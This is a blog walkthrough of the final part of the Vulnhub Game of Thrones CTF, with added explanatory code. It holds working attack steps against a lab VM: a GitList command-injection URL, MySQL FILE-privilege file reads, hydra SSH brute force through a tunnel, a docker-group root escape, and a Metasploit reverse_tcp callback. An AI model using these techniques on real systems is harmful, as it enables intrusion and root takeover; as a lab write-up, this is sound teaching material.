
Game of Thrones CTF 1 Walkthrough – Part 3

This post covers the third and last part of the walkthrough of the Game of Thrones CTF 1 provided by Vulnhub. You can find the first and second parts here and here. In the first two parts I had already found 5 kingdom flags and 1 secret flag.

I finished the second part with the 5th kingdom flag, the one for the Mountain and the Vale, where I also got the hint for accessing the IMAP server. So let's do this:

Flag 6 – The Reach

Looking at the open ports on the server I see that the IMAP port (143) is closed, so I somehow need to open it. I remembered the hints pointing to port knocking in the first part, so knocking on those ports in the given order should open the IMAP port.

root@kali:~# knock -v 192.168.56.101 3487:tcp 64535:tcp 12345:tcp
hitting tcp 192.168.56.101:3487
hitting tcp 192.168.56.101:64535
hitting tcp 192.168.56.101:12345
root@kali:~# nmap 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-28 15:06 CEST
Nmap scan report for winterfell.7kingdoms.ctf (192.168.56.101)
Host is up (0.00078s latency).
Not shown: 992 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http
143/tcp   open     imap
3306/tcp  filtered mysql
5432/tcp  open     postgresql
10000/tcp open     snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 95.83 seconds

Yes, port 143 is open now, so let's connect to it and see whether there are any emails. The server announces AUTH=LOGIN and AUTH=PLAIN, so the credentials from the previous flag can simply be sent with a LOGIN command:
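To make the mechanism behind the knock above concrete, here is an added example (not code from the CTF or from this post) of the server side of port knocking, in the style of knockd: a client has to hit the ports in the right order within a time window, a wrong port resets its progress, and only a completed sequence unlocks the service. The sequence is the one used above; the 10-second window and the log lines are constructed assumptions.

```python
"""Added example: a knockd-style knock sequence matcher (not from the CTF)."""
from collections import defaultdict
from dataclasses import dataclass

KNOCK_SEQUENCE = (3487, 64535, 12345)   # the sequence knocked above
KNOCK_TIMEOUT = 10.0                    # seconds from first to last knock (assumed)


@dataclass
class KnockState:
    index: int = 0          # next expected position in the sequence
    started: float = 0.0    # timestamp of the first correct knock


class KnockTracker:
    """Tracks per-client progress through the knock sequence."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self._state = defaultdict(KnockState)
        self.opened = set()   # clients that completed the sequence

    def hit(self, src, port, ts):
        """Record one connection attempt from `src` to `port` at time `ts`.
        Returns True if this hit completed the sequence for `src`."""
        st = self._state[src]
        # a partial sequence older than the window is discarded first
        if st.index and ts - st.started > self.timeout:
            st.index, st.started = 0, 0.0
        if port != self.sequence[st.index]:
            # wrong port resets progress; the wrong port may itself be knock #1
            st.index, st.started = 0, 0.0
            if port != self.sequence[0]:
                return False
        if st.index == 0:
            st.started = ts
        st.index += 1
        if st.index == len(self.sequence):
            self.opened.add(src)
            del self._state[src]
            return True
        return False


def replay(lines, tracker=None):
    """Feed constructed 'timestamp source port' log lines to a tracker and
    return the set of sources that unlocked the port."""
    tracker = tracker or KnockTracker()
    for line in lines:
        ts, src, port = line.split()
        tracker.hit(src, int(port), float(ts))
    return tracker.opened


# constructed sample: one correct sequence, one out of order, one too slow
SAMPLE_LOG = [
    "100.0 192.168.56.102 3487",
    "100.2 192.168.56.102 64535",
    "100.4 192.168.56.102 12345",
    "101.0 10.0.0.5 3487",
    "101.1 10.0.0.5 12345",
    "101.2 10.0.0.5 64535",
    "200.0 10.0.0.9 3487",
    "215.0 10.0.0.9 64535",
    "215.1 10.0.0.9 12345",
]

if __name__ == "__main__":
    print("port unlocked for:", sorted(replay(SAMPLE_LOG)))
```

Only the first client gets through: the second knocks the right ports in the wrong order, the third is slower than the window. That is also why a plain nmap of all ports does not reveal the knock ports as open: each knock is just a SYN to a closed port that the firewall logs.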

root@kali:~# nc 192.168.56.101 143
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=LOGIN AUTH=PLAIN] Kingdom of the Reach
? LOGIN olennatyrell@7kingdoms.ctf H1gh.Gard3n.powah                                                        
? OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
? LIST "" "*"
* LIST (\HasNoChildren \Trash) "/" Trash
* LIST (\HasNoChildren \Drafts) "/" Drafts
* LIST (\HasNoChildren \Sent) "/" Sent
* LIST (\HasNoChildren) "/" INBOX
? OK List completed (0.000 secs).
? Select INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1504823858] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* OK [HIGHESTMODSEQ 2] Highest
? OK [READ-WRITE] Select completed (0.000 secs).
? FETCH 1 BODY[]
* 1 FETCH (BODY[] {797}
Return-Path: <lorastyrell@7kingdoms.ctf>
Delivered-To: olennatyrell@7kingdoms.ctf
Received: by mail.7kingdoms.ctf (Postfix, from userid 0)
	id E1FA643329; Fri,  8 Sep 2017 00:37:37 +0200 (CEST)
Subject: You conquered the Kingdom of the Reach
From: Sir_Loras_Tyrell<lorastyrell@7kingdoms.ctf>
To: <olennatyrell@7kingdoms.ctf>
X-Mailer: mail (GNU Mailutils 2.99.98)
Message-Id: <20170907223737.E1FA643329@mail.7kingdoms.ctf>
Date: Fri,  8 Sep 2017 00:37:37 +0200 (CEST)

Congratulations!!

You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db

Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!

"The things I do for love..." - Jaime (Kingslayer) Lannister
)
? OK Fetch completed (0.000 secs).

Cool, that is the flag, plus credentials for the next kingdom, which according to the map is a GitList instance and a MySQL database.

Flag 7 – The Rock and King’s Landing

This is already the last kingdom flag! Connecting to http://192.168.56.101:1337 and logging in with the credentials from the email gives a GitList instance. In the repository at /casterly-rock/ there is a note from Tyrion:

There is a note under the bed. Somebody put it there. It says:

2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874

"The main gates of King's Landing are permanently closed by Queen's order. You must search for another entrance"

The note is hex encoded and decodes to:
/home/tyrionlannister/checkpoint.txt

I assume that this file holds the next hint, so I need a way to read it. After some trial and error I found an exploit for GitList with searchsploit. I could not get the exploit script itself to work because of authentication errors, but its write-up explains the mechanism well enough to exploit the GitList by hand: the blob path from the URL ends up inside a quoted argument of a git command that is run through a shell, so `""` closes that quoting and the backtick expression after it is executed by the shell (for details see https://www.exploit-db.com/exploits/33929/):

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60cat%20%2Fhome%2Ftyrionlannister%2Fcheckpoint.txt%60

This executes cat /home/tyrionlannister/checkpoint.txt on the server, with the privileges of the web application, and its output comes back in the blob view.
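The following is an added example, not GitList's code and not from the original post: it reproduces the bug class behind that URL as a vulnerable command builder next to a hardened one, and generates the percent-encoded injection URLs used here and for the mysql commands further down. The shape of the vulnerable call (a git command assembled as one shell string with the path inside double quotes) is an assumption about the pattern, not a copy of the real GitList source; nothing in the block runs git, both builders only return what would be executed.

```python
"""Added example (not GitList's code): the blob-path injection, its fix,
and the URL encoding used to deliver it."""
import shlex
import urllib.parse

BASE = "http://192.168.56.101:1337/casterly-rock/blob/master/"


def vulnerable_git_show(branch, path):
    """Assumed vulnerable pattern: user input interpolated into one shell
    string. Returns the string a shell would be handed."""
    return f'git show {branch}:"{path}"'


def safe_git_show(branch, path):
    """Hardened form: no shell, one argv element per argument, so quotes and
    backticks in `path` are just characters git sees in the object name."""
    if path.startswith("-"):
        raise ValueError("refusing a path that looks like an option")
    return ["git", "show", f"{branch}:{path}"]


def injection_path(command):
    """Blob path used in the walkthrough: an empty quoted string followed by
    a backtick command substitution."""
    return f'""`{command}`'


def injection_url(command):
    """Percent-encode the path for the URL. quote() keeps '/' by default,
    so safe='' is passed to encode it as %2F like the URLs on this page."""
    return BASE + urllib.parse.quote(injection_path(command), safe="")


def decode_url(url):
    """Recover the injected command from an encoded URL (handy when
    reviewing web server logs for this pattern); None if not an injection."""
    path = urllib.parse.unquote(url[len(BASE):])
    if path.startswith('""`') and path.endswith("`"):
        return path[3:-1]
    return None


if __name__ == "__main__":
    cmd = "cat /home/tyrionlannister/checkpoint.txt"
    # what the shell sees in the vulnerable build: the quotes are closed and
    # the backticks run `cmd` before git ever gets its argument
    print(vulnerable_git_show("master", injection_path(cmd)))
    # the hardened build keeps the whole path as a single, inert argument
    print(shlex.join(safe_git_show("master", injection_path(cmd))))
    print(injection_url(cmd))
```

decode_url is the detection side of the same thing: a `%22%22%60` prefix in a blob path in the access log is this exploit, whatever command follows.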

The file contained new credentials (cerseilannister/_g0dsHaveNoMercy_) for a database called kingslanding. Since MySQL (port 3306) is filtered from the outside, I connected to it from the server itself, again through the GitList injection, by running the mysql client with -e:

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20'show%20tables;'%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e 'show tables;'

There is a table called iron_throne. Let's see what is in there:

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20'select%20*%20from%20iron_throne;'%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e 'select * from iron_throne;'

The table holds a string of Morse code, which decodes to: /etc/mysql/flag

So let's see if I can read this flag the same way:

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60cat%20%2Fetc%2Fmysql%2Fflag%60

Unfortunately, I could not read the file with cat, and executing it or looking at its permissions did not work either. After going through the hints again I found one in the last image: “You still have some privileges on this kingdom. Use them wisely”. That might mean extra privileges on the database. Let's see:

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20%27show%20grants%20for%20current_user%3B%27%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e 'show grants for current_user;'

And indeed, the account has the FILE privilege, which is global (on every database and table). FILE lets the database server read files on its own host with LOAD DATA INFILE or LOAD_FILE(), using the permissions of the mysqld process rather than those of the web application, so a file that cat cannot reach may still be readable this way. I first tried to load /etc/mysql/flag into the table iron_throne, but that failed because the number of columns did not match, so I created a new table with a single column for the flag.

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20%22create%20table%20Flag%20(flag%20varchar(500))%3B%22%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "create table Flag (flag varchar(500));"

There was no error message from the MySQL server, so I assume the query was valid and the table was created. So let's try to load the file into this table.

http://192.168.56.101:1337/casterly-rock/blob/master/%22%22%60mysql%20kingslanding%20-h%20192.168.56.101%20-ucerseilannister%20-p_g0dsHaveNoMercy_%20-e%20%22load%20data%20infile%20%27%2Fetc%2Fmysql%2Fflag%27%20into%20table%20Flag%3B%22%60

mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "load data infile '/etc/mysql/flag' into table Flag;"

Again no MySQL error occurred, so I read the table with a select. There you go:

Found the last kingdom flag c8d46d341bea4fd5bff866a65ff8aea9 and also the credentials for the SSH port (daenerystargaryen-.Dracarys4thewin.)
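The grants check that decided this kingdom is worth automating. Below is an added example (not from the original post) that parses `SHOW GRANTS` output and flags the privileges which let a database account reach outside the engine, FILE above all, since that is what turned a database login into a file read here. The grant lines are constructed to resemble what this account would show; the post does not reproduce the real output.

```python
"""Added example: audit SHOW GRANTS output for file-access privileges."""
import re

# privileges that reach outside the database engine (assumed short list)
DANGEROUS = {
    "FILE": "read/write files as the mysqld user (LOAD DATA INFILE, LOAD_FILE, SELECT ... INTO OUTFILE)",
    "SUPER": "set global server variables and bypass some restrictions",
    "ALL PRIVILEGES": "includes FILE and SUPER",
    "GRANT OPTION": "can hand its own privileges to other accounts",
}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<who>\S+)"
    r"(?:\s+IDENTIFIED\s+BY\s+.+?)?(?:\s+WITH\s+(?P<with>.+))?$",
    re.IGNORECASE,
)


def parse_grant(line):
    """Return (privileges, scope, account, with-clause) from one grant line,
    or None if the line is not a GRANT statement."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        return None
    privs = [p.strip().upper() for p in m.group("privs").split(",")]
    with_clause = (m.group("with") or "").upper()
    if "GRANT OPTION" in with_clause:
        privs.append("GRANT OPTION")
    return privs, m.group("scope"), m.group("who"), with_clause


def audit_grants(lines):
    """Return (account, privilege, scope, why) for every dangerous grant."""
    findings = []
    for line in lines:
        parsed = parse_grant(line)
        if not parsed:
            continue
        privs, scope, who, _ = parsed
        for p in privs:
            if p in DANGEROUS:
                findings.append((who, p, scope, DANGEROUS[p]))
    return findings


def can_read_server_files(lines):
    """True if a grant gives FILE (or ALL) on *.*; FILE only exists globally."""
    return any(p in ("FILE", "ALL PRIVILEGES") and scope == "*.*"
               for _, p, scope, _ in audit_grants(lines))


# constructed sample resembling SHOW GRANTS output for this account
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'cerseilannister'@'%' IDENTIFIED BY PASSWORD '<secret>'",
    "GRANT FILE ON *.* TO 'cerseilannister'@'%'",
    "GRANT SELECT, INSERT, CREATE ON `kingslanding`.* TO 'cerseilannister'@'%'",
]

if __name__ == "__main__":
    for finding in audit_grants(SAMPLE_GRANTS):
        print(finding)
    print("can read files on the DB host:", can_read_server_files(SAMPLE_GRANTS))
```

On a hardened server the same LOAD DATA INFILE would also be stopped by secure_file_priv, which restricts the directories the server will read from or write to regardless of the FILE privilege; the CTF box evidently leaves it unset.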

Secret Flag – Dragonglass

What is left: the final flag, which sits behind the SSH port, and two secret flags. For one of them I already have an idea: on the Postgres server there was another table called braavos_book. But that comes later; first let me connect to the SSH port.

root@kali:~# ssh daenerystargaryen@192.168.56.101
daenerystargaryen@192.168.56.101's password: 
 __            _   _            ___         
|  |   ___ ___| |_|_|___ ___   |  _|___ ___ 
|  |__| . | . | '_| |   | . |  |  _| . |  _|
|_____|___|___|_,_|_|_|_|_  |  |_| |___|_|  
                        |___|               
 ____                          _             
|    \ ___ ___ ___ ___ ___ ___| |___ ___ ___ 
|  |  |  _| .'| . | . |   | . | | .'|_ -|_ -|
|____/|_| |__,|_  |___|_|_|_  |_|__,|___|___|
              |___|       |___|              

daenerystargaryen@7kingdoms:~$ ls
checkpoint.txt  digger.txt
daenerystargaryen@7kingdoms:~$ cat checkpoint.txt 

"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre

"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly

"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
daenerystargaryen@7kingdoms:~$ 

Ok, there seems to be another machine on 172.25.0.2. The hint ‘maybe we can reach the root of the problem pivoting from outside to use this digger’ probably means brute forcing the root password with the digger.txt file as wordlist.
So I copied the file to my local machine. With hydra I tried to crack the root password on 192.168.56.101 but did not succeed (I forgot that brute forcing the main machine gets you blocked for a while; that is the fail2ban the hint says is missing on the other host). So it is probably the root account on 172.25.0.2. Since I do not have hydra on the first machine, I created an SSH tunnel through it to the second host and ran hydra against the local end of the tunnel:

root@kali:~# ssh daenerystargaryen@192.168.56.101 -L 2222:172.25.0.2:22 -N
root@kali:~# hydra -l root -P digger.txt ssh://localhost:2222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-22 21:20:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1001 login tries (l:1/p:1001), ~63 tries per task
[DATA] attacking ssh://localhost:2222/
[2222][ssh] host: localhost   login: root   password: Dr4g0nGl4ss!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-22 21:21:35
root@kali:~# ssh root@localhost -p 2222
root@localhost's password: 

You found the
 ____                          _             
|    \ ___ ___ ___ ___ ___ ___| |___ ___ ___ 
|  |  |  _| .'| . | . |   | . | | .'|_ -|_ -|
|____/|_| |__,|_  |___|_|_|_  |_|__,|___|___|
              |___|       |___|              
       _         
 _____|_|___ ___ 
|     | |   | -_|
|_|_|_|_|_|_|___|
                 
root@1558d33076eb:~# ls -al
total 20
drwx------ 1 root root 4096 Aug 29 18:14 .
drwxr-xr-x 1 root root 4096 Sep  7 22:37 ..
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  290 Aug 29 17:10 flag.txt
root@1558d33076eb:~# cat flag.txt 
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9

Now you have the Dragonglass weapons to fight against the White Walkers.

Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven

"The time has come" - The Three Eyed Raven
root@1558d33076eb:~# 

Yes, found the next secret flag, the one from the Dragonglass mine (the hostname 1558d33076eb in the prompt looks like a Docker container ID, which fits the Docker hint from earlier). The flag also gives me the credentials for a second account on the host, the one for Bran Stark. So let me connect to it.

root@kali:~# ssh branstark@192.168.56.101
branstark@192.168.56.101's password: 
 _____ _         _    _____     _   _   _
|   __|_|___ ___| |  | __  |___| |_| |_| |___
|   __| |   | .'| |  | __ -| .'|  _|  _| | -_|
|__|  |_|_|_|__,|_|  |_____|__,|_| |_| |_|___|

branstark@7kingdoms:~$ ls
checkpoint.txt
branstark@7kingdoms:~$ cat checkpoint.txt 

Now you are ready to face the final battle!! Try to escalate to root.

"Seven blessings to all of you and good luck" - Game of Thrones CTF master ;)

branstark@7kingdoms:~$

This part took me quite a while, so let me speed up and just tell you how I finally escalated privileges. After checking the obvious options, such as binaries with the setuid bit set or exploits for the kernel, I noticed that the host runs Docker and remembered a hint that mentioned it. The ssh_login output below shows the key fact: branstark is a member of the docker group (gid 999). Anyone who can talk to the Docker daemon can start a container that mounts the host's root filesystem, so docker group membership is effectively root. Metasploit has a local exploit module that automates exactly that, so I used it.
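As an added example (not from the original post and not the Metasploit module's code), here is the check that turns the `id` line printed by ssh_login into a finding, together with the manual equivalent of what the module does. The list of groups treated as root-equivalent is an assumed, deliberately short one, and the container image name in the manual command is assumed to be available on the host.

```python
"""Added example: spot root-equivalent group membership in id(1) output."""
import re

# group name -> why it is effectively root on a typical Linux host (assumed list)
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can run a container with / bind-mounted and act as root on the host",
    "lxd": "can launch a privileged container with the host disk mounted",
    "sudo": "may run commands as root, depending on sudoers",
    "wheel": "may run commands as root, depending on sudoers",
    "disk": "raw access to block devices bypasses file permissions",
    "shadow": "can read /etc/shadow and crack the hashes offline",
}

ID_RE = re.compile(r"uid=(\d+)\(([\w.-]+)\)\s+gid=\d+\([\w.-]+\)\s+groups=(.+)")
GROUP_RE = re.compile(r"(\d+)\(([\w.-]+)\)")


def parse_id(id_output):
    """Return (uid, username, [group names]) from `id` output. Trailing text,
    such as the uname string ssh_login appends, is ignored."""
    m = ID_RE.search(id_output)
    if not m:
        raise ValueError("not an id(1) line")
    uid, name, groups = int(m.group(1)), m.group(2), m.group(3)
    return uid, name, [g for _, g in GROUP_RE.findall(groups)]


def root_equivalent(id_output):
    """Map each dangerous group the user is in to the reason it matters."""
    _, _, groups = parse_id(id_output)
    return {g: ROOT_EQUIVALENT_GROUPS[g] for g in groups if g in ROOT_EQUIVALENT_GROUPS}


def manual_escape_command(image="alpine"):
    """Hands-on equivalent of the Metasploit module: mount the host's root
    filesystem into a container and chroot into it. `image` is assumed to be
    present on the host (no pull needed on an isolated CTF box)."""
    return f"docker run --rm -it -v /:/mnt {image} chroot /mnt /bin/sh"


# the line printed by the ssh_login module in the walkthrough
BRANSTARK_ID = ("uid=1001(branstark) gid=1001(branstark) "
                "groups=1001(branstark),999(docker) Linux 7kingdoms 4.9.0-3-amd64")

if __name__ == "__main__":
    for group, why in root_equivalent(BRANSTARK_ID).items():
        print(f"{group}: {why}")
    print("manual equivalent:", manual_escape_command())
```

The fix on a real system is the same in both directions: do not put ordinary users in the docker group, and treat the Docker socket as a root credential when auditing who can reach it.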

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set USERNAME branstark
USERNAME => branstark
msf auxiliary(ssh_login) > set PASSWORD Th3_Thr33_Ey3d_Raven
PASSWORD => Th3_Thr33_Ey3d_Raven
msf auxiliary(ssh_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(ssh_login) > run

[+] 192.168.56.101:22 - Success: 'branstark:Th3_Thr33_Ey3d_Raven' 'uid=1001(branstark) gid=1001(branstark) groups=1001(branstark),999(docker) Linux 7kingdoms 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.56.102:42183 -> 192.168.56.101:22) at 2017-11-29 13:46:46 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(docker_daemon_privilege_escalation) > set SESSION 1
SESSION => 1
msf exploit(docker_daemon_privilege_escalation) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(docker_daemon_privilege_escalation) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Writing payload executable to '/tmp/sSonzaBe'
[*] Executing script to create and run docker container
[*] Waiting 60s for payload
[*] Sending stage (847604 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.101:55224) at 2017-11-29 13:47:56 +0100
[+] Deleted /tmp/sSonzaBe

meterpreter > cd /root
meterpreter > ls
Listing: /root
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  25    fil   2017-09-08 00:39:28 +0200  .bash_history
100644/rw-r--r--  570   fil   2010-01-31 12:52:26 +0100  .bashrc
40755/rwxr-xr-x   4096  dir   2017-08-10 23:56:54 +0200  .nano
100644/rw-r--r--  148   fil   2015-08-17 17:30:33 +0200  .profile
100644/rw-r--r--  66    fil   2017-08-10 23:56:54 +0200  .selected_editor
40700/rwx------   4096  dir   2017-08-19 13:30:48 +0200  .ssh
100700/rwx------  466   fil   2017-08-29 19:13:48 +0200  checkpoint.txt
100700/rwx------  1156  fil   2017-09-07 23:00:03 +0200  final_battle

meterpreter > cat checkpoint.txt

To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons

Some hints:

type of file = ???
pass = ???
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))

"Hodor... Hodor!!" - Hodor

meterpreter > 

Along with this checkpoint.txt there is also a file called final_battle, which is a password-protected zip. I need to compute the password from the three secret flags using the pseudocode in the hint: the last 10 characters of each secret flag, concatenated.

Secret Flag – Braavos Book

Since one of them is still missing I need to find it first. As mentioned, I assume it is in the braavos_book table in the Postgres database, so let's reconnect to it. Using the same procedure as in Part 2, I found the table contents:

1 | City of Braavos is a very particular place. It is not so far from here.
2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
6 | "A girl has no name" - Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc

What I see here are again some quotes from the series, except for the last one, which looks encrypted with some ancient cipher. I also noticed that there is no id 5. After a while I found out that it is a Caesar cipher with a shift of 10, which tr can undo by mapping K-Z back to A-P and A-J back to Q-Z. Decoding it gives the following:

echo "Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc" | tr 'K-ZA-Jk-za-j' 'A-Za-z'
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
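The tr one-liner only works once you know the shift. As an added example (not from the original post), here is the general version: apply all 26 shifts to the braavos_book row and pick the one whose output contains the most common English words. The word list is an assumed heuristic, not part of the CTF.

```python
"""Added example: Caesar decoding with automatic shift recovery."""
import string

# small heuristic list of frequent English words (assumed)
COMMON_WORDS = {"the", "to", "you", "your", "and", "of", "will", "be",
                "is", "it", "on", "this", "as", "one", "he", "a"}


def caesar_shift(text, shift):
    """Shift letters by `shift` positions (mod 26), keeping case and punctuation."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def decode(text, shift):
    """Undo an encryption shift of `shift`; the tr command above is decode(text, 10)."""
    return caesar_shift(text, -shift)


def score(text):
    """Number of tokens in `text` that are common English words."""
    words = text.lower().replace(".", " ").replace(":", " ").replace("-", " ").split()
    return sum(1 for w in words if w in COMMON_WORDS)


def crack(text):
    """Return (shift, plaintext) for the candidate shift with the best score."""
    best = max(range(26), key=lambda s: score(decode(text, s)))
    return best, decode(text, best)


# the encrypted row (id 9) of the braavos_book table
CIPHERTEXT = ("Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy "
              "snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c "
              "vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb "
              "zkccgybn gsvv lo: FkvkbWybqrevsc")

if __name__ == "__main__":
    shift, plain = crack(CIPHERTEXT)
    print(f"shift {shift}: {plain}")
```

Word scoring is enough for a text this long; for very short ciphertexts a letter-frequency (chi-squared) score is the usual fallback, but it needs more text than a single quote to be reliable.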

Ok. Next, I assume that the missing id 5 is the lost page number. Following the hint, the next step is to look at the aryas_kill_list table from Part 2 under the 5th entry, which is TheRedWomanMelisandre. So let me connect to the database called braavos with username/password TheRedWomanMelisandre/ValarMorghulis. That database holds only one table, and it contains the flag 3f82c41a70a8b0cfec9052252d9fd721.

Final Flag

Now that I have all three secret flags, I can write a little script that computes the password from them according to the pseudocode in the hint:

#!/usr/bin/env python3

# the three secret flags, in the order the hint lists them
flag1 = '8bf8854bebe108183caeb845c7676ae4'    # Savages
flag2 = '3f82c41a70a8b0cfec9052252d9fd721'    # Braavos
flag3 = 'a8db1d82db78ed452ba0882fb9554fc9'    # Dragonglass

# substr(flag, strlen(flag) - 10, strlen(flag)) is just the last 10 characters
password = flag1[-10:] + flag2[-10:] + flag3[-10:]

print("Password: " + password)

which gives the password

Password: 45c7676ae4252d9fd7212fb9554fc9

Now simply unzipping final_battle with this password gives a text file called flag.txt which contains:

Final Battle flag: 8e63dcd86ef9574181a9b6184ed3dde5
                     _
 ___ _ _ _ ___ ___ _| |
| . | | | |   | -_| . |
|  _|_____|_|_|___|___|
|_|

You won the battle against White Walkers. You pwned the Game of Thrones CTF!!! (v1.0 September 2017)

Now the seven kingdoms can rest in peace for a long time ruled by a true king/queen.

Congratulations and I hope you enjoyed the experience as much as me making it!!

Designed by Oscar Alfonso (OscarAkaElvis or v1s1t0r)
